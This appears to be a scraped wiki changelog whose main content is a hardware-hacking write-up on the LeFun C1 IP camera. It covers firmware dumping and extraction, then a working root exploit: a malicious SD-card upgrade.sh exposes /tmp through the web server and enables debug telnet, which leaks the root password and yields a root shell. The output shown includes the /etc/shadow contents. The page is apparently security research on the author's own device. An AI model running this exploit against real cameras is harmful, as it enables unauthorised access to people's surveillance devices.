<rSwitch name="SPARE_REAL6" value="0.0"/>
<rSwitch name="SPARE_REAL7" value="0.0"/>
<rSwitch name="SPARE_REAL8" value="0.0"/>
<rSwitch name="SPARE_REAL9" value="0.0"/>
<rSwitch name="SPARE_REAL10" value="0.0"/>
<rSwitch name="SPARE_REAL1" value="0.0"/>
<rSwitch name="SPARE_REAL2" value="0.0"/>
<rSwitch name="SPARE_REAL3" value="0.0"/>
<tSwitch name="SPARE_TEXT1" value=" "/>
<tSwitch name="SPARE_TEXT2" value=" "/>
<tSwitch name="SPARE_TEXT3" value=" "/>
<tSwitch name="SPARE_TEXT4" value=" "/>
<tSwitch name="SPARE_TEXT5" value=" "/>
<tSwitch name="SPARE_TEXT6" value=" "/>
<tSwitch name="SPARE_TEXT7" value=" "/>
<tSwitch name="SPARE_TEXT8" value=" "/>
<tSwitch name="SPARE_TEXT9" value=" "/>
<tSwitch name="SPARE_TEXT10" value=" "/>
</Controls>
</PayloadProfile>
</profile:ProfileList></pre>

SJM Merlin at Home

2017-05-14T19:20:57Z

Rjmendez: SJM Merlin@home model EX1150

File:Merlin-antenna2.jpg

2017-05-14T19:05:50Z

Rjmendez:

File:Merlin-antenna1.jpg

2017-05-14T19:05:22Z

Rjmendez:

File:Merlin-side usb.jpg

2017-05-14T19:04:28Z

Rjmendez:

File:Merlin-back.jpg

2017-05-14T19:03:49Z

Rjmendez:

File:Merlin-front.jpg

2017-05-14T19:03:03Z

Rjmendez:

File:Merlin-uart.jpg

2017-05-14T19:02:03Z

Rjmendez: Rjmendez uploaded a new version of "File:Merlin-uart.jpg"

File:Merlin-uart2.jpg

2017-05-14T19:00:28Z

Rjmendez: Rjmendez uploaded a new version of "File:Merlin-uart2.jpg"

File:Merlin-uart2.jpg

2017-05-14T18:55:48Z

Rjmendez:

File:Merlin-uart.jpg

2017-05-14T18:39:59Z

Rjmendez:

File:Merlin-at-home-1.jpg

2017-05-14T18:35:19Z

Rjmendez:

LeFun Cloud IPCam

2017-04-21T02:06:50Z

Rjmendez: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Cameras This page will be dedicated to a general overview, descriptions, and informatio..."

__FORCETOC__
{{Disclaimer}}
[[File:Cloudipcam_store.png|100px|left|thumb]]
[[Category:Cameras]]
This page will be dedicated to a general overview, descriptions, and information related to the LeFun C1 wireless surveillance camera.

== About ==
The LeFun C1 wireless surveillance camera is a network (Wifi/Ethernet) camera w/ IR LEDs provided by LeFun and available on Amazon.com.

<gallery>
File:Cloudipcam_front.jpg
File:Cloudipcam_profile.jpg
File:Cloudipcam_back.jpg
</gallery>

== Disassembly ==
The base of the camera is attached with four small phillips screws hidden under silicone rubber feet. Remove all four, the base and board should be open to you.

<gallery>
File:Cloudipcam_bottom.jpg
File:Cloudipcam_board.jpg
</gallery>

== UART ==
A Login Console is presented on UART (3.3v) at 38400 baud. The pinout for UART can be found below.

<gallery>
File:Cloudipcam_UART_pins.jpg
</gallery>

== Exploitation ==

U-Boot is available on boot and can probably be init hijacked, thankfully there is a better option that does not require access to the internals.

[[File:Cloudipcam_mxic25l12835f.jpg|100px|thumb]]

The firmware on this model was not available for download elsewhere and I didn't feel like waiting on the firmware to download over the uart at 38.4k baud so we will resort to the hot air and minipro TL866CS. SPI flash model mxic25l12835f was removed and dumped, the issue I had was that from 0x0 to 0xC00000 every 4 bytes were swapped.

'''Firmware Format'''

Raw data from the chip has an interesting patern to it.

From U-Boot

<pre>=> md.b 0x02000000 130
02000000: 47 4d 38 31 32 36 00 00 00 00 01 00 00 00 01 00 GM8126..........
02000010: 00 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 ................
02000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000030: 00 00 00 00 08 00 00 00 0c 00 00 00 18 00 00 00 ................
02000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa ..............U.
02000100: fa f8 bb f0 ba ba e7 70 5a be 03 aa 0a ea ae ba .......pZ.......
02000110: 22 f3 7a ff ba 2d 08 aa f7 aa 2a 3c fa bb aa 9e ".z..-....*<....
02000120: 80 2e ea fd b9 ea c2 b5 ec ab 6a ba 8f aa ba ab ..........j.....</pre>

Dumped from the chip.

<pre>rjmendez@Reggie:~/cloudipcamera$ hd cloudipcamera_mxic25l12835f.BIN | head -n 15
00000000 31 38 4d 47 00 00 36 32 00 01 00 00 00 01 00 00 |18MG..62........|
00000010 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 08 00 00 00 0c 00 00 00 18 |................|
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 aa 55 00 00 |.............U..|
00000100 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
*
00001000 80 5a 47 4d 00 00 00 00 00 00 29 18 00 00 00 00 |.ZGM......).....|
00001010 6f 62 73 6e 62 2e 74 6f 00 00 6e 69 00 00 00 00 |obsnb.to..ni....|
00001020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00001100 ea 00 00 0e e5 9f f0 14 e5 9f f0 14 e5 9f f0 14 |................|
00001110 e5 9f f0 14 e1 a0 00 00 e5 9f f0 10 e5 9f f0 10 |................|</pre>

Lets reorder the bytes.

<pre>objcopy -I binary -O binary --reverse-bytes=4 cloudipcamera_mxic25l12835f.BIN cloudipcamera_mxic25l12835f.BIN.swapped</pre>

Merging the two halves together gives us the entire image.

<pre>rjmendez@Reggie:~/cloudipcamera$ binwalk cloudipcamera_mxic25l12835f.BIN.merged

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
809008 0xC5830 CRC32 polynomial table, little endian
852224 0xD0100 Linux kernel ARM boot executable zImage (little-endian)
865293 0xD340D gzip compressed data, maximum compression, from Unix, last modified: 2015-10-23 07:16:16
12582912 0xC00000 JFFS2 filesystem, little endian</pre>

'''Filesystem'''

The notable data includes the root filesystem.

<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls
D340D D8B3E4 D8BA40 D8BF44 D8CE50 DC11AC DC15E4 DC1AF4 E7C814 E7CC44 ED5158 ED565C ED5BAC FB50C0 FFE67C jffs2-root-1 jffs2-root-3 jffs2-root-8
_D340D.extracted D8B514 D8BC0C D8C670 D8CEFC DC12AC DC16E8 DC1BC0 E7C90C E7CD44 ED5324 ED5754 ED5CD8 FB51EC FFEAB0 jffs2-root-10 jffs2-root-4 jffs2-root-9
D8B0BC D8B640 D8BD04 D8CBC4 D8D4E8 DC1340 DC180C E7C050 E7CA0C E7CE48 ED541C ED5854 ED5D64 FB5278 FFEDFC jffs2-root-11 jffs2-root-5
D8B1BC D8B6CC D8BE04 D8CCBC D8E460 DC13EC DC193C E7C198 E7CAA0 E7CF6C ED551C ED5958 ED5E30 FB5344 jffs2-root jffs2-root-12 jffs2-root-6
D8B2C0 D8B938 D8BE98 D8CDBC DC10B4 DC14E4 DC1A68 E7C5B0 E7CB4C ED5050 ED55B0 ED5A7C ED5F38 FFE230 jffs2-root-0 jffs2-root-2 jffs2-root-7
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/
1A100 _1A100.extracted 9FD828
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/
168.cpio cpio-root
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/
bin dev etc init lib mnt proc project root sbin sys tmp usr var
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/root/
welcome.txt
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ cat _D340D.extracted/_1A100.extracted/cpio-root/root/welcome.txt
welcome to (c)shenzhen mining mipc world!
enjoy it!</pre>

And the config storage.

<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls jffs2-root/fs_1/ -R
jffs2-root/fs_1/:
dev_data ipc_data latest_dhcp_ip_eth0 system_data

jffs2-root/fs_1/dev_data:
system_config

jffs2-root/fs_1/ipc_data:
8188eu_ap_2G.conf aec_amr.xml ao0.xml buildinfo.xml io_alert.xml motion_alert.xml ntp_info.xml ptz0.xml RT2870AP.dat vec_half.xml vs0.xml
action_conf.xml aec_g711.xml aoc0.xml data_version ipc_conf.xml motion_ex_alert.xml osd_show_time.xml ptz.xml RT2870STA_adhoc.dat vec_hd.xml vsc0.xml
active_server.xml aec_g726.xml ap.conf default_gw.xml license.xml net_info.sh pass.mp ra0.xml RT2870STA_infra.dat vec_jpeg.xml
aec_aac.xml alarm.xml as0.xml dps localtime net_info.xml pass.up recording_root.xml sd_conf.xml vec_min.xml
aec_adpcm.xml alert_device_conf.xml asc3.xml eth0.xml mediainfo.xml nick_conf.xml proxy.xml recording_task.xml server.xml vec_normal.xml

jffs2-root/fs_1/ipc_data/dps:
cacs

jffs2-root/fs_1/ipc_data/dps/cacs:
61646d696e02

jffs2-root/fs_1/system_data:</pre>

Theres also an archive in /project on the root filesystem.

<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root$ ls -laht project/

total 3.2M
drwxr-xr-x 2 rjmendez rjmendez 4.0K Apr 20 12:17 .
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml</pre>

Its called by the init script in /etc/init.d/dev_init.sh

<pre>#prepare project
unlzma -c /project/*.tar.lzma > /tmp/project.tar
rm /project/*.tar.lzma

...

tar -xvf /tmp/project.tar -C /project/
rm -rf /tmp/project.tar
chmod -R 777 /project

#dev_start
if [ -e /mnt/mtd/flag_debug_dev_start ]; then
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" /mnt/mtd/flag_debug_dev_start existed
else
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" run /project/apps/app/ipc/data/sh/dev_start.sh
cd /project/apps/app/ipc/data/sh
./dev_start.sh
fi</pre>

Extracting it all gives us this.

<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ unlzma -c ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma > project.tar
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ tar -xf project.tar
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ ls -laht
total 14M
drwxr-xr-x 5 rjmendez rjmendez 4.0K Apr 20 14:03 .
-rw-rw-r-- 1 rjmendez rjmendez 11M Apr 20 14:02 project.tar
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 apps
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 platforms
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 faraday
-rw-r--r-- 1 rjmendez rjmendez 2 Oct 23 2015 kernel_version</pre>

Tons of good data in here!

'''Gaining root'''

We have a great entry point as well inside of /project/apps/app/ipc/data/sh/sd_card_insert.sh.

<pre>#!/bin/sh

#mount sd_card
if [ ! -d /mnt/sd ]; then
/bin/mkdir /mnt/sd
fi
mount -o noatime,nodiratime,norelatime -t vfat /dev/mmcblk0p1 /mnt/sd

#run hook
if [ -e /mnt/sd/upgrade/upgrade.sh ]; then
chmod 777 /mnt/sd/upgrade/upgrade.sh
sh /mnt/sd/upgrade/upgrade.sh &
fi

wget http://127.0.0.1:80/ccm/CcmNotifyRequest/-dvalue-1.xml -O 1.xml

rm -f 1.xml</pre>

What the hell is going on in /project/apps/app/ipc/data/sh/dev_passwd.sh?

<pre>path_prompt=/tmp/prompt.debug
path_pass=/tmp/pass.debug

...

#Generate ctx if needed
if [ -z $ctx ]; then
ctx_file=/tmp/ctx.dev
if [ -e $ctx_file ]; then
read ctx < $ctx_file
fi

if [ -z $ctx ]; then
ctx=$RANDOM
echo $ctx > $ctx_file
fi
fi

...

${bindir}/mipc_tool -cmd pass -devid ${devid} -prompt ${path_prompt} -pass ${path_pass}

...

read pass < $path_pass
read prompt < $path_prompt
echo "pass=${pass}, prompt=${prompt}"
/bin/hostname ${prompt}${promp_eth}${promp_wifi}
echo "root:${pass}"|chpasswd</pre>

It looks like they are generating a new root password after rebooting. Everything is still running as root and the password is in a file at /tmp/pass.debug, we should be able to get in over the serial line but that’s not very sexy.
A look into /project/apps/app/ipc/data/sh/dev_telnet.sh gives us another option.

<pre>#!/bin/sh

port=9527
file_flag=/mnt/mtd/flag_debug_telnet
if [ -e ${file_flag} ]; then
mode=on
fi

usage()
{
echo Usage:$0 [-m,--mode on/off] [-h,--help]
exit
}

ARGS=`getopt -a -o m:h -l mode:,help -- "$@"`

#set -- "${ARGS}"
eval set -- "${ARGS}"

while true
do
case "$1" in
-m|--mode)
mode="$2"
shift
;;
-h|--help)
usage
;;
--)
shift
break
;;
esac
shift
done

if [ x"${mode}" == xon ]; then
if [ ! -e ${file_flag} ]; then
touch ${file_flag}
fi

if [ "" == "`ps -w | grep telnet | grep ${port} | grep -v grep`" ]; then
telnetd -p ${port} &
fi
elif [ x"${mode}" == xoff ]; then
if [ -e ${file_flag} ]; then
rm ${file_flag}
fi

ps w| grep telnetd | grep ${port} | grep -v -E "grep" | while read line
do
pid=${line%% *}
kill -9 $pid
done
fi</pre>

Well well well… Lets create an upgrade folder and throw in this script inside of upgrade.sh on our vfat formatted micro sd card.

<pre>#!/bin/sh
sleep 45
cd /project/apps/app/ipc/data/http/ && ln -s /tmp &
/project/apps/app/ipc/data/sh/dev_telnet.sh -m on</pre>

After a little bit we should see this show up on the web server.

<pre>rjmendez@Reggie:~/cloudipcamera$ curl http://192.168.187.254/tmp/pass.debug
264e37dcd841b35344c68e8f95dc8b11</pre>

And then we can try telnet on the nonstandard debug port.

<pre>rjmendez@Reggie:~/cloudipcamera$ telnet 192.168.187.254 9527
Trying 192.168.187.254...
Connected to 192.168.187.254.
Escape character is '^]'.

1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254 login: root
Password:
|---------------------------------------------------------------------------|
| A |
| AAA |
| AAAAA |
| AAAAAAA |
| AAAA AA |
| A AAAA AA |
| AAA AAAA AA AAA AAAAA AAA AAAAA AAAAA |
| AAAAA AAAA AA AA AA AA AA AA AA |
| AAAAAAAAAA AA AAA AA AA AAA AA AA AA AA |
| AAAAA AAAA AA AAA AA AA AAA AA AA AA AA |
| AAAAA A AA AAA AA AA AAA AA AA AAAAAA |
| AAAAA AA AAA AA AA AAA AA AA AA |
| AAAAAA AAAA AAA AA AA AAA AA AA AAAAAA |
|===========================================================================|
| |
| http://www.shenzhenmining.com |
| power by (C)shenzhenmining 2012 |
|---------------------------------------------------------------------------|
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# echo "Root password is '264e37dcd841b35344c68e8f95dc8b11'"
Root password is '264e37dcd841b35344c68e8f95dc8b11'
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ls -l /root
-rwxr-xr-x 1 root root 54 Oct 23 2015 welcome.txt
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /root/welcome.txt
welcome to (c)shenzhen mining mipc world!
enjoy it!
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/shadow
root:S5Ada/QN0yHBo:12963:0:99999:7:::
bin:*:12963:0:99999:7:::
daemon:*:12963:0:99999:7:::
adm:*:12963:0:99999:7:::
lp:*:12963:0:99999:7:::
sync:*:12963:0:99999:7:::
shutdown:*:12963:0:99999:7:::
halt:*:12963:0:99999:7:::
uucp:*:12963:0:99999:7:::
operator:*:12963:0:99999:7:::
nobody:*:12963:0:99999:7:::</pre>

This device has never been connected to the internet, lets see what’s running on it.

<pre>[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ps | grep mipc
600 root 2532 S ./mipc_tool -cmd wd -len 20
826 root 2664 S ./mipc_tool -cmd debug -server 1
945 root 2664 S ./mipc_tool -cmd led -dev eth -interval 500
987 root 2664 S ./mipc_tool -cmd led -dev wifi -interval 500
1009 root 2668 S ./mipc_tool -cmd led -dev single -interval 500
1015 root 2664 S ./mipc_tool -cmd click_listen
1063 root 2668 S ../../../../../platforms/faraday-linux-armv5/bin/mipc_tool -cmd tcpproxy --passive-remote 127.0.0.1:23 --remote 218.14.146.199:7024:/tmp/tcp_post.txt --header-notify-file
1179 root 54140 S ./mipc -cont-conf ../../../apps/app/ipc/conf/container.conf </pre>

== Future ==

We need to look into mipc_tool and the mipc program itself.

File:Cloudipcam store.png

2017-04-21T01:58:20Z

Rjmendez:

File:Cloudipcam board.jpg

2017-04-21T01:54:27Z

Rjmendez:

File:Cloudipcam bottom.jpg

2017-04-21T01:51:51Z

Rjmendez:

File:Cloudipcam back.jpg

2017-04-21T01:51:23Z

Rjmendez:

File:Cloudipcam profile.jpg

2017-04-21T01:50:34Z

Rjmendez:

File:Cloudipcam front.jpg

2017-04-21T01:48:54Z

Rjmendez:

File:Cloudipcam UART pins.jpg

2017-04-21T01:37:30Z

Rjmendez:

File:Cloudipcam mxic25l12835f.jpg

2017-04-21T01:32:34Z

Rjmendez: